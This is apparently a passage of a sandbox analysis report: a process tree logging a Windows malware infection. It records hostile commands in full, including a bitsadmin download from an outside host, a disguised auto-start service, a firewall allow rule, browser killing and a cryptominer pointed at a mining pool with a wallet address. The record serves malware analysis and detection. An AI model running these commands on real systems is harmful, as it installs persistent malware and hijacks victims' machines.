                                                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                    PID:6268
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                      PID:4892
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                          PID:5548
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                        PID:6616
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                        "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Download via BitsAdmin
                                                                                                                                                                                                                                                                                        PID:7032
                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -phs4opgQYQzGH8jz -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                          PID:4196
                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pD83mn5aM5tet4nm -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                            PID:6948
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                              PID:5988
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                PID:5768
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                  PID:6776
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                    PID:4908
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                      PID:6856
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\fjnkJfWrEDeA\fjnkJfWrEDeA.dll" fjnkJfWrEDeA
                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                        PID:5960
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\fjnkJfWrEDeA\fjnkJfWrEDeA.dll" fjnkJfWrEDeA
                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                          PID:4536
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                          PID:1116
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                          PID:1288
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                            PID:412
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                              PID:4184
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnDB2D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                PID:5268
                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                  PID:6660
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B9A9.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B9A9.exe
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:7012
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\B9A9.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\B9A9.exe"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                          PID:4448
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C6AA.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\C6AA.exe
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                        PID:6964
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\tndyondl\
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:5604
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ickoypqz.exe" C:\Windows\SysWOW64\tndyondl\
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:5544
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" create tndyondl binPath= "C:\Windows\SysWOW64\tndyondl\ickoypqz.exe /d\"C:\Users\Admin\AppData\Local\Temp\C6AA.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:5524
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" description tndyondl "wifi internet conection"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:60
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" start tndyondl
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:6828
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:5272
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:4296
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DCC3.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\DCC3.exe
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:6952
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                          PID:6996
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                            PID:3024
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\EF62.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\EF62.exe
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:4180
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\tndyondl\ickoypqz.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\tndyondl\ickoypqz.exe /d"C:\Users\Admin\AppData\Local\Temp\C6AA.exe"
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                          PID:6748
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                            svchost.exe
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                            PID:2368
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                              svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:3032
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                            PID:7016
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                            PID:1076
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:4876
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                              PID:1788
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                              PID:7164
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                              PID:4160
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                PID:6784
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                              PID:6500
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:4260
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:5980
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                  PID:4172
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                  PID:7136
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                  PID:4696
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:5756
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:6452
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:2564
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:6488
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                    PID:6784
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:6072
                                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:4196
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                        PID:3140
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                        PID:4868
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 4868 -s 1960
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                          PID:6892
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                        PID:1916
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 1916 -s 2816
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                          PID:5516
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                        PID:5284
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:2280
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                          PID:4256
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                          PID:3312
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                          PID:1620
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:4460
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\AUDIODG.EXE 0x410
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:7016
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
